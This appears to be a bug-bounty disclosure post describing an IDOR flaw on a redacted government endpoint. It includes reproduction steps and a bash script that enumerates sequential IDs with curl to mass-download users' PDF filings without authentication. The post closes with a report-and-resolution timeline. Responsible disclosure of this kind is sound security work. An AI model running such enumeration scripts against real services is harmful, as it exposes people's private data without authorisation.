IDOR To Massive Government Data Leak
Hello, everyone! I am back with one of my findings that I reported in late January 2023 and was marked as resolved a few months ago. In one of the endpoints, I discovered that I could view and download a massive amount of user data without any authentication. Here is a brief introduction to IDOR. Although there was no authentication, there might have been an authorization issue. Insecure Direct Object Reference (IDOR) is a vulnerability that occurs when an application lacks proper access control checks, enabling attackers to manipulate, destroy, or disclose data without valid authorization.
Steps to Reproduce:
- Use a browser to navigate to: https://redact.gov/cart/receipt.aspx
- Click on “Redacted Report for Corporation #1337”
- It will redirect to the https://redact.gov/Display/RetrieveSOSFinalPDF?Id=1337
- Now change the Id as https://redact.gov/Display/RetrievePDF?Id=
At first, I downloaded the data one by one for proof of concept. But later, I thought, why not automate it since there is no authentication required and I can check for possible data. So, I generated a bash script to check the file availability and, if available, download it as a PDF. Here is the following bash script to demonstrate the mass download of files as a PoC.
#!/bin/bash
# check if start and end arguments were provided
if [ -z "$1" ] || [ -z "$2" ]; then
echo "Error: Please provide a start and end filingId as arguments."
exit 1
fi
start=$1
end=$2
for ((i=start; i<=end; i++)); do
# construct the URL with the current filingId
url="https://redact.gov/Display/RetrievePDF?Id=$i"
# download the file using curl
curl -o "filing-$i.pdf" $url
# check if the download was successful
if [ $? -eq 0 ]; then
echo "Successfully downloaded file $i to filing-$i.pdf"
else
echo "Error: Failed to download file $i"
fi
done
./script.sh 500 10000
Then, it successfully downloaded the files from 500 out of 10,000 IDs, and all of the white ones in the screenshots are valid users’ PDF files. This issue was accepted as a P3 risk, even though a few of the data could be searchable. It was not an intended feature, because there was possible to abuse the massive amount of sensitive user data.
Timeline:
Reported → 25 Jan 2023
Triaged →25 Jan 2023
Resolved →20 Mar 2023